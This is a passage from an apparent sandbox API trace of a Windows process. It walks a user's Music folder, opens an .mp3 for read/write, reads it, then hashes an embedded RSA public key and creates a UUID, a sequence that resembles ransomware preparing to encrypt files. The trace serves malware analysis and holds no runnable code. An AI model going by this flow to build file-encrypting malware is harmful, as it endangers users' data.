hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0203.116] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\") returned="Music\\" [0203.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0203.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1de0 | out: hHeap=0x620000) returned 1 [0203.116] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0203.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0203.117] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0203.117] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0203.117] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0203.117] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0203.117] PathFindFileNameW (pszPath="") returned="" [0203.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.117] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\9AsT-P\\dKtSN5wkI\\*" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\9ast-p\\dktsn5wki\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c3fb8c0, ftCreationTime.dwHighDateTime=0x1d89b8f, ftLastAccessTime.dwLowDateTime=0xb7bfd10, ftLastAccessTime.dwHighDateTime=0x1d89d71, ftLastWriteTime.dwLowDateTime=0xb7bfd10, ftLastWriteTime.dwHighDateTime=0x1d89d71, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0203.120] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.120] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c3fb8c0, ftCreationTime.dwHighDateTime=0x1d89b8f, ftLastAccessTime.dwLowDateTime=0xb7bfd10, ftLastAccessTime.dwHighDateTime=0x1d89d71, ftLastWriteTime.dwLowDateTime=0xb7bfd10, ftLastWriteTime.dwHighDateTime=0x1d89d71, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0203.120] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80c43da0, ftCreationTime.dwHighDateTime=0x1d8a701, ftLastAccessTime.dwLowDateTime=0x33880af0, ftLastAccessTime.dwHighDateTime=0x1d8a722, ftLastWriteTime.dwLowDateTime=0x33880af0, ftLastWriteTime.dwHighDateTime=0x1d8a722, nFileSizeHigh=0x0, nFileSizeLow=0x8e59, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2wJfI-R ZYJEjLJl_Hmt.mp3", cAlternateFileName="2WJFI-~1.MP3")) returned 1 [0203.120] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.120] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x2c6eb88 [0203.121] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.121] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\9AsT-P\\dKtSN5wkI\\2wJfI-R ZYJEjLJl_Hmt.mp3") returned=".mp3" [0203.121] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\9AsT-P\\dKtSN5wkI\\2wJfI-R ZYJEjLJl_Hmt.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\9ast-p\\dktsn5wki\\2wjfi-r zyjejljl_hmt.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0203.122] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=36441) returned 1 [0203.122] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0203.128] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x8e33, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.128] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0203.130] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0203.131] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0203.131] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0203.131] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x8e59, lpOverlapped=0x0) returned 1 [0203.132] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0203.132] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0203.132] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0203.132] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0203.132] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0203.133] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0203.133] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0203.133] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0203.133] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0203.133] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0203.133] GetLastError () returned 0x0 [0203.133] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0203.133] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0203.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0203.134] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0203.134] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0203.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0203.134] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0203.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0203.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0203.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e60) returned 0x2ea99b0 [0203.134] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0203.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0203.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0203.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0203.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0203.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0203.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1de0 [0203.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36f8 [0203.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1e28 [0203.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3710 [0203.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3740 [0203.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37a0 [0203.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3758 [0203.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0203.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0203.136] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0203.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0203.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3740 | out: hHeap=0x620000) returned 1 [0203.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3758 | out: hHeap=0x620000) returned 1 [0203.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37a0 | out: hHeap=0x620000) returned 1 [0203.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0203.137] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37a0 [0203.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a00 [0203.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3758 [0203.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0203.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3740 [0203.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0203.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0203.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0203.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0203.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0203.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0203.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0203.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0203.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0203.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3758 | out: hHeap=0x620000) returned 1 [0203.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0203.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3740 | out: hHeap=0x620000) returned 1 [0203.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0203.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0203.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37a0 | out: hHeap=0x620000) returned 1 [0203.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0203.139] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0203.139] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0203.139] GetCurrentThreadId () returned 0x66c [0203.139] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0203.139] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea98b8 [0203.139] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9648 [0203.139] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0203.140] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0203.140] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0203.140] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0203.140] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0203.140] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.140] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.140] GetCurrentThreadId () returned 0x66c [0203.140] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.141] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.141] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0203.141] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.141] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.141] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.141] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.142] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0203.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0203.142] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0203.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0203.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0203.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0203.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0203.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37a0 [0203.142] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0203.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0203.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0203.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0203.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0203.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0203.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0203.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0203.143] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3740 [0203.143] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0203.143] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0203.143] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0203.143] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0203.143] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0203.143] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0203.143] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0203.143] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3758 [0203.143] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0203.143] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0203.143] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0203.143] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3728 [0203.143] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0203.143] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea37b8 [0203.143] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0203.143] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0203.143] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0203.143] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3788 [0203.144] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0203.144] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3770 [0203.144] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0203.144] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea37d0 [0203.144] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3770 | out: hHeap=0x620000) returned 1 [0203.144] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3770 [0203.144] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3788 | out: hHeap=0x620000) returned 1 [0203.144] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0203.144] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0203.144] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0203.144] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0203.144] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83750 [0203.144] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3740 | out: hHeap=0x620000) returned 1 [0203.144] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3740 [0203.144] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0203.144] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0203.144] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37a0 | out: hHeap=0x620000) returned 1 [0203.144] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0203.144] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37d0 | out: hHeap=0x620000) returned 1 [0203.145] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0203.145] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0203.145] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0203.145] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0203.145] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0203.145] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3740 | out: hHeap=0x620000) returned 1 [0203.145] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0203.145] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0203.145] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0203.145] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0203.146] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0203.146] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0203.146] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0203.146] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0203.146] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0203.147] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.147] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0203.147] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0203.147] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0203.147] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3770 | out: hHeap=0x620000) returned 1 [0203.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0203.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37b8 | out: hHeap=0x620000) returned 1 [0203.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0203.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3758 | out: hHeap=0x620000) returned 1 [0203.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3728 | out: hHeap=0x620000) returned 1 [0203.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0203.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0203.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0203.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3710 | out: hHeap=0x620000) returned 1 [0203.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1e28 | out: hHeap=0x620000) returned 1 [0203.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0203.150] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0203.150] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0203.150] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0203.151] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0203.151] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0203.151] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0203.151] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0203.151] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0203.152] 